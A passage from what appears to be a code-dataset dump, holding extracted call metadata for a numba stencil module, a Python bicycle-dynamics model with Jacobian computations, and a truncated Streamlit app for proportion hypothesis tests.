51): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((552, 12, 552, 52), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(552, 33, 552, 51): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((666, 20, 666, 51), 'numba.core.utils.pysignature', 'utils.pysignature', ({(666, 38, 666, 50): 'stencil_func'}, {}), '(stencil_func)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((696, 
12, 696, 51), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(696, 33, 696, 50): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((698, 12, 698, 52), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(698, 33, 698, 51): 'kernel_copy.blocks'}, {}), '(kernel_copy.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((750, 12, 750, 51), 'numba.core.ir_utils.dump_blocks', 'ir_utils.dump_blocks', ({(750, 33, 750, 50): 'stencil_ir.blocks'}, {}), '(stencil_ir.blocks)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((775, 21, 775, 53), 'numba.np.numpy_support.from_dtype', 'numpy_support.from_dtype', ({(775, 46, 775, 52): 'rdtype'}, {}), '(rdtype)', False, 'from numba.np import numpy_support\n'), ((307, 22, 308, 67), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(307, 38, 308, 66): '"""Stencil kernel with no accesses to relatively indexed arrays."""'}, {}), "('Stencil kernel with no accesses to relatively indexed arrays.'\n )", False, 'from numba.core.errors import NumbaValueError\n'), ((415, 32, 415, 61), 'numba.core.utils.pysignature', 'utils.pysignature', ({(415, 50, 415, 60): 'dummy_func'}, {}), '(dummy_func)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((440, 24, 440, 43), 'copy.deepcopy', 'copy.deepcopy', ({(440, 38, 440, 42): 'stmt'}, {}), '(stmt)', False, 'import copy\n'), ((587, 19, 587, 36), 'numpy.isfinite', 'np.isfinite', ({(587, 31, 587, 35): 'cval'}, {}), '(cval)', True, 'import numpy as np\n'), ((589, 19, 589, 33), 'numpy.isnan', 'np.isnan', ({(589, 28, 589, 32): 'cval'}, {}), '(cval)', True, 'import numpy as np\n'), ((620, 26, 620, 52), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(620, 47, 620, 51): 'cval'}, {}), '(cval)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((680, 37, 680, 65), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(680, 60, 680, 64): 'name'}, {}), '(name)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((777, 47, 777, 79), 'numba.np.numpy_support.map_layout', 'numpy_support.map_layout', ({(777, 72, 777, 78): 'result'}, {}), '(result)', False, 'from numba.np import numpy_support\n'), ((332, 26, 333, 77), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(333, 24, 333, 76): '"""Stencil index does not match array dimensionality."""'}, {}), "('Stencil index does not match array dimensionality.')", False, 'from numba.core.errors import NumbaValueError\n'), ((591, 21, 591, 35), 'numpy.isinf', 'np.isinf', ({(591, 30, 591, 34): 'cval'}, {}), '(cval)', True, 'import numpy as np\n'), ((603, 31, 604, 49), 'numba.np.numpy_support.as_dtype', 'numpy_support.as_dtype', ({(604, 31, 604, 48): 'return_type.dtype'}, {}), '(return_type.dtype)', False, 'from numba.np import numpy_support\n'), ((607, 40, 607, 66), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(607, 61, 607, 65): 'cval'}, {}), '(cval)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((609, 26, 609, 46), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(609, 42, 609, 45): 'msg'}, {}), '(msg)', False, 'from numba.core.errors import NumbaValueError\n'), ((623, 26, 623, 46), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(623, 42, 623, 45): 'msg'}, {}), '(msg)', 
False, 'from numba.core.errors import NumbaValueError\n'), ((712, 33, 712, 53), 'numba.core.ir.Block', 'ir.Block', ({(712, 42, 712, 47): 'scope', (712, 49, 712, 52): 'loc'}, {}), '(scope, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((778, 33, 778, 56), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(778, 54, 778, 55): 'x'}, {}), '(x)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((783, 33, 783, 56), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(783, 54, 783, 55): 'x'}, {}), '(x)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((107, 31, 107, 59), 'numba.core.ir.Var', 'ir.Var', ({(107, 38, 107, 43): 'scope', (107, 45, 107, 53): 'out_name', (107, 55, 107, 58): 'loc'}, {}), '(scope, out_name, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((108, 31, 108, 64), 'numba.core.ir.Var', 'ir.Var', ({(108, 38, 108, 43): 'scope', (108, 45, 108, 58): 'index_vars[0]', (108, 60, 108, 63): 'loc'}, {}), '(scope, index_vars[0], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((118, 39, 118, 78), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(118, 62, 118, 77): '"""stencil_index"""'}, {}), "('stencil_index')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((119, 39, 119, 71), 'numba.core.ir.Var', 'ir.Var', ({(119, 46, 119, 51): 'scope', (119, 53, 119, 65): 's_index_name', (119, 67, 119, 70): 'loc'}, {}), '(scope, s_index_name, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((121, 37, 121, 77), 'numba.core.ir.Expr.build_tuple', 'ir.Expr.build_tuple', ({(121, 57, 121, 71): 'var_index_vars', (121, 73, 121, 76): 'loc'}, {}), '(var_index_vars, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((123, 31, 123, 59), 'numba.core.ir.Var', 'ir.Var', ({(123, 38, 123, 43): 'scope', (123, 45, 123, 53): 'out_name', (123, 55, 123, 58): 'loc'}, {}), '(scope, out_name, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((126, 29, 126, 75), 'numba.core.ir.SetItem', 'ir.SetItem', ({(126, 40, 126, 44): 'rvar', (126, 46, 126, 57): 's_index_var', (126, 59, 126, 69): 'stmt.value', (126, 71, 126, 74): 'loc'}, {}), '(rvar, s_index_var, stmt.value, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((212, 36, 212, 70), 'numba.core.ir.Var', 'ir.Var', ({(212, 43, 212, 48): 'scope', (212, 50, 212, 64): 'index_names[0]', (212, 66, 212, 69): 'loc'}, {}), '(scope, index_names[0], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((213, 34, 213, 73), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(213, 57, 213, 72): '"""stencil_index"""'}, {}), "('stencil_index')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((214, 34, 214, 61), 'numba.core.ir.Var', 'ir.Var', ({(214, 41, 214, 46): 'scope', (214, 48, 214, 55): 'tmpname', (214, 57, 214, 60): 'loc'}, {}), '(scope, tmpname, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((242, 39, 242, 78), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(242, 62, 242, 77): '"""stencil_index"""'}, {}), "('stencil_index')", False, 'from 
numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((243, 39, 243, 71), 'numba.core.ir.Var', 'ir.Var', ({(243, 46, 243, 51): 'scope', (243, 53, 243, 65): 's_index_name', (243, 67, 243, 70): 'loc'}, {}), '(scope, s_index_name, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((293, 37, 293, 75), 'numba.core.ir.Expr.build_tuple', 'ir.Expr.build_tuple', ({(293, 57, 293, 69): 'ind_stencils', (293, 71, 293, 74): 'loc'}, {}), '(ind_stencils, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((329, 26, 330, 74), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(330, 24, 330, 73): '"""Non-tuple or non-integer used as stencil index."""'}, {}), "('Non-tuple or non-integer used as stencil index.')", False, 'from numba.core.errors import NumbaValueError\n'), ((721, 38, 721, 68), 'numba.core.ir.Jump', 'ir.Jump', ({(721, 46, 721, 62): 'body_first_label', (721, 64, 721, 67): 'loc'}, {}), '(body_first_label, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((779, 38, 779, 61), 'numba.core.typing.typeof.typeof', 'typing.typeof.typeof', ({(779, 59, 779, 60): 'x'}, {}), '(x)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((109, 40, 109, 79), 'numba.core.ir.SetItem', 'ir.SetItem', ({(109, 51, 109, 55): 'rvar', (109, 57, 109, 61): 'ivar', (109, 63, 109, 73): 'stmt.value', (109, 75, 109, 78): 'loc'}, {}), '(rvar, ivar, stmt.value, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((115, 40, 115, 67), 'numba.core.ir.Var', 'ir.Var', ({(115, 47, 115, 52): 'scope', (115, 54, 115, 61): 'one_var', (115, 63, 115, 66): 'loc'}, {}), '(scope, one_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((122, 40, 122, 79), 'numba.core.ir.Assign', 'ir.Assign', ({(122, 50, 122, 60): 'tuple_call', (122, 62, 122, 73): 's_index_var', (122, 75, 122, 78): 'loc'}, {}), '(tuple_call, s_index_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((221, 38, 221, 64), 'numba.njit', 'numba.njit', ({(221, 49, 221, 63): 'slice_addition'}, {}), '(slice_addition)', False, 'import numba\n'), ((222, 42, 222, 77), 'numba.core.types.functions.Dispatcher', 'types.functions.Dispatcher', ({(222, 69, 222, 76): 'sa_func'}, {}), '(sa_func)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((224, 35, 224, 76), 'numba.core.ir.Global', 'ir.Global', ({(224, 45, 224, 61): '"""slice_addition"""', (224, 63, 224, 70): 'sa_func', (224, 72, 224, 75): 'loc'}, {}), "('slice_addition', sa_func, loc)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((226, 50, 226, 108), 'numba.core.ir.Expr.call', 'ir.Expr.call', ({(226, 63, 226, 69): 'sa_var', (226, 71, 226, 98): '[stmt_index_var, index_var]', (226, 100, 226, 102): '()', (226, 104, 226, 107): 'loc'}, {}), '(sa_var, [stmt_index_var, index_var], (), loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((233, 39, 234, 68), 'numba.core.ir.Expr.binop', 'ir.Expr.binop', ({(233, 53, 233, 65): 'operator.add', (233, 67, 233, 81): 'stmt_index_var', (234, 53, 234, 62): 'index_var', (234, 64, 234, 67): 'loc'}, {}), '(operator.add, stmt_index_var, index_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), 
((254, 38, 254, 75), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(254, 61, 254, 74): '"""const_index"""'}, {}), "('const_index')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((255, 38, 255, 65), 'numba.core.ir.Var', 'ir.Var', ({(255, 45, 255, 50): 'scope', (255, 52, 255, 59): 'tmpname', (255, 61, 255, 64): 'loc'}, {}), '(scope, tmpname, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((259, 40, 259, 76), 'numba.core.ir.Var', 'ir.Var', ({(259, 47, 259, 52): 'scope', (259, 54, 259, 70): 'index_names[dim]', (259, 72, 259, 75): 'loc'}, {}), '(scope, index_names[dim], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((262, 38, 262, 81), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(262, 61, 262, 80): '"""ind_stencil_index"""'}, {}), "('ind_stencil_index')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((263, 38, 263, 65), 'numba.core.ir.Var', 'ir.Var', ({(263, 45, 263, 50): 'scope', (263, 52, 263, 59): 'tmpname', (263, 61, 263, 64): 'loc'}, {}), '(scope, tmpname, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((265, 42, 265, 75), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(265, 65, 265, 74): '"""getitem"""'}, {}), "('getitem')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((266, 42, 266, 73), 'numba.core.ir.Var', 'ir.Var', ({(266, 49, 266, 54): 'scope', (266, 56, 266, 67): 'getitemname', (266, 69, 266, 72): 'loc'}, {}), '(scope, getitemname, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((267, 42, 268, 82), 'numba.core.ir.Expr.getitem', 'ir.Expr.getitem', ({(267, 58, 267, 72): 'stmt_index_var', (268, 55, 268, 76): 'const_index_vars[dim]', (268, 78, 268, 81): 'loc'}, {}), '(stmt_index_var, const_index_vars[dim], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((294, 40, 294, 79), 'numba.core.ir.Assign', 'ir.Assign', ({(294, 50, 294, 60): 'tuple_call', (294, 62, 294, 73): 's_index_var', (294, 75, 294, 78): 'loc'}, {}), '(tuple_call, s_index_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((320, 34, 322, 65), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(321, 32, 322, 64): '"""stencil kernel index is not constant,\'neighborhood\' option required"""'}, {}), '(\n "stencil kernel index is not constant,\'neighborhood\' option required")', False, 'from numba.core.errors import NumbaValueError\n'), ((734, 28, 734, 51), 'numba.core.ir.Jump', 'ir.Jump', ({(734, 36, 734, 45): 'new_label', (734, 47, 734, 50): 'loc'}, {}), '(new_label, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((204, 34, 205, 75), 'numba.core.errors.NumbaValueError', 'NumbaValueError', ({(204, 50, 205, 74): '"""stencil kernel index is not constant, \'neighborhood\' option required"""'}, {}), '(\n "stencil kernel index is not constant, \'neighborhood\' option required")', False, 'from numba.core.errors import NumbaValueError\n'), ((220, 51, 220, 91), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(220, 74, 220, 90): '"""slice_addition"""'}, {}), "('slice_addition')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((225, 44, 225, 72), 
'numba.core.ir.Assign', 'ir.Assign', ({(225, 54, 225, 58): 'g_sa', (225, 60, 225, 66): 'sa_var', (225, 68, 225, 71): 'loc'}, {}), '(g_sa, sa_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((228, 44, 228, 87), 'numba.core.ir.Assign', 'ir.Assign', ({(228, 54, 228, 73): 'slice_addition_call', (228, 75, 228, 81): 'tmpvar', (228, 83, 228, 86): 'loc'}, {}), '(slice_addition_call, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((235, 44, 235, 76), 'numba.core.ir.Assign', 'ir.Assign', ({(235, 54, 235, 62): 'acc_call', (235, 64, 235, 70): 'tmpvar', (235, 72, 235, 75): 'loc'}, {}), '(acc_call, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((269, 44, 269, 83), 'numba.core.ir.Assign', 'ir.Assign', ({(269, 54, 269, 65): 'getitemcall', (269, 67, 269, 77): 'getitemvar', (269, 79, 269, 82): 'loc'}, {}), '(getitemcall, getitemvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((280, 42, 280, 68), 'numba.njit', 'numba.njit', ({(280, 53, 280, 67): 'slice_addition'}, {}), '(slice_addition)', False, 'import numba\n'), ((281, 46, 281, 81), 'numba.core.types.functions.Dispatcher', 'types.functions.Dispatcher', ({(281, 73, 281, 80): 'sa_func'}, {}), '(sa_func)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((283, 39, 283, 80), 'numba.core.ir.Global', 'ir.Global', ({(283, 49, 283, 65): '"""slice_addition"""', (283, 67, 283, 74): 'sa_func', (283, 76, 283, 79): 'loc'}, {}), "('slice_addition', sa_func, loc)", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((285, 54, 285, 114), 'numba.core.ir.Expr.call', 'ir.Expr.call', ({(285, 67, 285, 73): 'sa_var', (285, 75, 285, 104): '[getitemvar, index_vars[dim]]', (285, 106, 285, 108): '()', (285, 110, 285, 113): 'loc'}, {}), '(sa_var, [getitemvar, index_vars[dim]], (), loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((289, 43, 290, 78), 'numba.core.ir.Expr.binop', 'ir.Expr.binop', ({(289, 57, 289, 69): 'operator.add', (289, 71, 289, 81): 'getitemvar', (290, 57, 290, 72): 'index_vars[dim]', (290, 74, 290, 77): 'loc'}, {}), '(operator.add, getitemvar, index_vars[dim], loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((296, 34, 296, 83), 'numba.core.ir.Expr.getitem', 'ir.Expr.getitem', ({(296, 50, 296, 66): 'stmt.value.value', (296, 67, 296, 78): 's_index_var', (296, 79, 296, 82): 'loc'}, {}), '(stmt.value.value, s_index_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((230, 43, 230, 89), 'numba.core.ir.Expr.getitem', 'ir.Expr.getitem', ({(230, 59, 230, 75): 'stmt.value.value', (230, 77, 230, 83): 'tmpvar', (230, 85, 230, 88): 'loc'}, {}), '(stmt.value.value, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((237, 43, 237, 89), 'numba.core.ir.Expr.getitem', 'ir.Expr.getitem', ({(237, 59, 237, 75): 'stmt.value.value', (237, 77, 237, 83): 'tmpvar', (237, 85, 237, 88): 'loc'}, {}), '(stmt.value.value, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((256, 54, 256, 72), 'numba.core.ir.Const', 'ir.Const', ({(256, 63, 256, 66): 'dim', (256, 68, 256, 71): 'loc'}, {}), '(dim, loc)', False, 'from numba.core import types, typing, 
utils, ir, config, ir_utils, registry\n'), ((279, 55, 279, 95), 'numba.core.ir_utils.mk_unique_var', 'ir_utils.mk_unique_var', ({(279, 78, 279, 94): '"""slice_addition"""'}, {}), "('slice_addition')", False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((284, 48, 284, 76), 'numba.core.ir.Assign', 'ir.Assign', ({(284, 58, 284, 62): 'g_sa', (284, 64, 284, 70): 'sa_var', (284, 72, 284, 75): 'loc'}, {}), '(g_sa, sa_var, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((287, 48, 287, 91), 'numba.core.ir.Assign', 'ir.Assign', ({(287, 58, 287, 77): 'slice_addition_call', (287, 79, 287, 85): 'tmpvar', (287, 87, 287, 90): 'loc'}, {}), '(slice_addition_call, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n'), ((291, 48, 291, 80), 'numba.core.ir.Assign', 'ir.Assign', ({(291, 58, 291, 66): 'acc_call', (291, 68, 291, 74): 'tmpvar', (291, 76, 291, 79): 'loc'}, {}), '(acc_call, tmpvar, loc)', False, 'from numba.core import types, typing, utils, ir, config, ir_utils, registry\n')] |
lujieyang/irs_lqr | examples/bicycle/bicycle_dynamics.py | bc9cade6a3bb2fa2d76bdd5fe453030a7b28700f | import numpy as np
import pydrake.symbolic as ps
import torch
import time
from irs_lqr.dynamical_system import DynamicalSystem
class BicycleDynamics(DynamicalSystem):
def __init__(self, h):
        """
        x = [x pos, y pos, heading, speed, steering_angle]
        u = [acceleration, steering_velocity]
        """
        super().__init__()
self.h = h
self.dim_x = 5
self.dim_u = 2
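        # Kinematic bicycle model integrated below with an explicit Euler step
        # of size h (the wheelbase is effectively normalized to 1):
        #   x_dot = v*cos(heading), y_dot = v*sin(heading),
        #   heading_dot = v*tan(steer), v_dot = u[0], steer_dot = u[1]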
"""Jacobian computations"""
self.x_sym = np.array([ps.Variable("x_{}".format(i)) for i in range(self.dim_x)])
self.u_sym = np.array([ps.Variable("u_{}".format(i)) for i in range(self.dim_u)])
self.f_sym = self.dynamics_sym(self.x_sym, self.u_sym)
self.jacobian_xu_sym = ps.Jacobian(self.f_sym, np.hstack((self.x_sym, self.u_sym)))
def dynamics_sym(self, x, u):
"""
Symbolic expression for dynamics. Used to compute
linearizations of the system.
x (np.array, dim: n): state
u (np.array, dim: m): action
"""
heading = x[2]
v = x[3]
steer = x[4]
dxdt = np.array([
v * ps.cos(heading),
v * ps.sin(heading),
v * ps.tan(steer),
u[0],
u[1]
])
x_new = x + self.h * dxdt
return x_new
def dynamics(self, x, u):
"""
Numeric expression for dynamics.
x (np.array, dim: n): state
u (np.array, dim: m): action
"""
heading = x[2]
v = x[3]
steer = x[4]
dxdt = np.array([
v * np.cos(heading),
v * np.sin(heading),
v * np.tan(steer),
u[0],
u[1]
])
x_new = x + self.h * dxdt
return x_new
def dynamics_batch(self, x, u):
"""
        Batch dynamics, implemented with numpy.
-args:
x (np.array, dim: B x n): batched state
u (np.array, dim: B x m): batched input
-returns:
xnext (np.array, dim: B x n): batched next state
"""
heading = x[:,2]
v = x[:,3]
steer = x[:,4]
dxdt = np.vstack((
v * np.cos(heading),
v * np.sin(heading),
v * np.tan(steer),
u[:,0],
u[:,1]
)).transpose()
x_new = x + self.h * dxdt
return x_new
def dynamics_batch_torch(self, x, u):
"""
        Batch dynamics, implemented with pytorch; inputs are moved to the GPU.
-args:
x (np.array, dim: B x n): batched state
u (np.array, dim: B x m): batched input
-returns:
xnext (np.array, dim: B x n): batched next state
"""
x = torch.Tensor(x).cuda()
u = torch.Tensor(u).cuda()
heading = x[:,2]
v = x[:,3]
steer = x[:,4]
dxdt = torch.vstack((
v * torch.cos(heading),
v * torch.sin(heading),
v * torch.tan(steer),
u[:,0],
u[:,1]
)).T
x_new = x + self.h * dxdt
return x_new
def jacobian_xu(self, x, u):
"""
        Recover the linearized dynamics df/d(x, u) evaluated at x, u.
"""
env = {self.x_sym[i]: x[i] for i in range(self.dim_x)}
env.update({self.u_sym[i]: u[i] for i in range(self.dim_u)})
f_x = ps.Evaluate(self.jacobian_xu_sym, env)
return f_x
def jacobian_xu_batch(self, x, u):
"""
        Recover the linearized dynamics df/d(x, u) for a batch of x, u.
"""
dxdu_batch = np.zeros((
x.shape[0], x.shape[1], x.shape[1] + u.shape[1]))
for i in range(x.shape[0]):
dxdu_batch[i] = self.jacobian_xu(x[i], u[i])
return dxdu_batch
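# ---------------------------------------------------------------------------
# Minimal usage sketch (not part of the original module; the step size and the
# state/input values below are illustrative assumptions).
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    bicycle = BicycleDynamics(h=0.1)
    x0 = np.array([0.0, 0.0, 0.0, 1.0, 0.1])   # [x, y, heading, speed, steer]
    u0 = np.array([0.5, 0.0])                  # [acceleration, steering velocity]
    x1 = bicycle.dynamics(x0, u0)               # one explicit-Euler step
    AB = bicycle.jacobian_xu(x0, u0)            # 5 x 7 linearization [A | B]
    print(x1)
    print(AB.shape)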
| [((121, 14, 121, 52), 'pydrake.symbolic.Evaluate', 'ps.Evaluate', ({(121, 26, 121, 46): 'self.jacobian_xu_sym', (121, 48, 121, 51): 'env'}, {}), '(self.jacobian_xu_sym, env)', True, 'import pydrake.symbolic as ps\n'), ((128, 21, 129, 61), 'numpy.zeros', 'np.zeros', ({(128, 30, 129, 60): '(x.shape[0], x.shape[1], x.shape[1] + u.shape[1])'}, {}), '((x.shape[0], x.shape[1], x.shape[1] + u.shape[1]))', True, 'import numpy as np\n'), ((24, 55, 24, 90), 'numpy.hstack', 'np.hstack', ({(24, 65, 24, 89): '(self.x_sym, self.u_sym)'}, {}), '((self.x_sym, self.u_sym))', True, 'import numpy as np\n'), ((98, 12, 98, 27), 'torch.Tensor', 'torch.Tensor', ({(98, 25, 98, 26): 'x'}, {}), '(x)', False, 'import torch\n'), ((99, 12, 99, 27), 'torch.Tensor', 'torch.Tensor', ({(99, 25, 99, 26): 'u'}, {}), '(u)', False, 'import torch\n'), ((37, 16, 37, 31), 'pydrake.symbolic.cos', 'ps.cos', ({(37, 23, 37, 30): 'heading'}, {}), '(heading)', True, 'import pydrake.symbolic as ps\n'), ((38, 16, 38, 31), 'pydrake.symbolic.sin', 'ps.sin', ({(38, 23, 38, 30): 'heading'}, {}), '(heading)', True, 'import pydrake.symbolic as ps\n'), ((39, 16, 39, 29), 'pydrake.symbolic.tan', 'ps.tan', ({(39, 23, 39, 28): 'steer'}, {}), '(steer)', True, 'import pydrake.symbolic as ps\n'), ((57, 16, 57, 31), 'numpy.cos', 'np.cos', ({(57, 23, 57, 30): 'heading'}, {}), '(heading)', True, 'import numpy as np\n'), ((58, 16, 58, 31), 'numpy.sin', 'np.sin', ({(58, 23, 58, 30): 'heading'}, {}), '(heading)', True, 'import numpy as np\n'), ((59, 16, 59, 29), 'numpy.tan', 'np.tan', ({(59, 23, 59, 28): 'steer'}, {}), '(steer)', True, 'import numpy as np\n'), ((106, 16, 106, 34), 'torch.cos', 'torch.cos', ({(106, 26, 106, 33): 'heading'}, {}), '(heading)', False, 'import torch\n'), ((107, 16, 107, 34), 'torch.sin', 'torch.sin', ({(107, 26, 107, 33): 'heading'}, {}), '(heading)', False, 'import torch\n'), ((108, 16, 108, 32), 'torch.tan', 'torch.tan', ({(108, 26, 108, 31): 'steer'}, {}), '(steer)', False, 'import torch\n'), ((79, 16, 79, 31), 'numpy.cos', 'np.cos', ({(79, 23, 79, 30): 'heading'}, {}), '(heading)', True, 'import numpy as np\n'), ((80, 16, 80, 31), 'numpy.sin', 'np.sin', ({(80, 23, 80, 30): 'heading'}, {}), '(heading)', True, 'import numpy as np\n'), ((81, 16, 81, 29), 'numpy.tan', 'np.tan', ({(81, 23, 81, 28): 'steer'}, {}), '(steer)', True, 'import numpy as np\n')] |
harmkenn/PST_Deploy_Test | apps/proportions.py | 2484acf13f1f998c98fa94fad98c1f75c27d292b | import streamlit as st
import math
from scipy.stats import *
import pandas as pd
import numpy as np
from plotnine import *
def app():
# title of the app
st.subheader("Proportions")
st.sidebar.subheader("Proportion Settings")
prop_choice = st.sidebar.radio("",["One Proportion","Two Proportions"])
if prop_choice == "One Proportion":
c1,c2,c3 = st.columns(3)
with c1:
x = int(st.text_input("Hits",20))
n = int(st.text_input("Tries",25))
with c2:
nullp = float(st.text_input("Null:",.7))
alpha = float(st.text_input("Alpha",.05))
with c3:
st.markdown("Pick a test:")
tail_choice = st.radio("",["Left Tail","Two Tails","Right Tail"])
one = st.columns(1)
with one[0]:
p_hat = x/n
tsd = math.sqrt(nullp*(1-nullp)/n)
cise = math.sqrt(p_hat*(1-p_hat)/n)
z = (p_hat - nullp)/tsd
x = np.arange(-4,4,.1)
y = norm.pdf(x)
ndf = pd.DataFrame({"x":x,"y":y})
normp = ggplot(ndf) + coord_fixed(ratio = 4)
if tail_choice == "Left Tail":
pv = norm.cdf(z)
cz = norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,z))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,cz))
if tail_choice == "Two Tails":
pv = 2*(1-norm.cdf(abs(z)))
cz = abs(norm.ppf(alpha/2))
rcz = "±" + str(abs(norm.ppf(alpha/2)))
cl = 1 - alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (-4,-1*abs(z)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (abs(z),4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (-4,-1*abs(cz)))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (abs(cz),4))
if tail_choice == "Right Tail":
pv = 1 - norm.cdf(z)
cz = -1 * norm.ppf(alpha)
rcz = cz
cl = 1 - 2*alpha
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "steelblue", xlim = (z,4))
normp = normp + stat_function(fun = norm.pdf, geom = "area",fill = "orange", xlim = (cz,4))
me = cz * cise
rme = "±" + str(abs(me))
data = pd.DataFrame({"p-Hat":p_hat,"z-Score":z,"p-Value":pv,"CV":rcz,"Test SD":tsd,"C-Level":cl,"CI SE":cise,"ME":rme},index = [0])
st.write(data)
normp = normp + geom_segment(aes(x = z, y = 0, xend = z, yend = norm.pdf(z)),color="red")
normp = normp + geom_line(aes(x=x,y=y))
st.pyplot(ggplot.draw(normp))
lower = p_hat - abs(me)
upper = p_hat + abs(me)
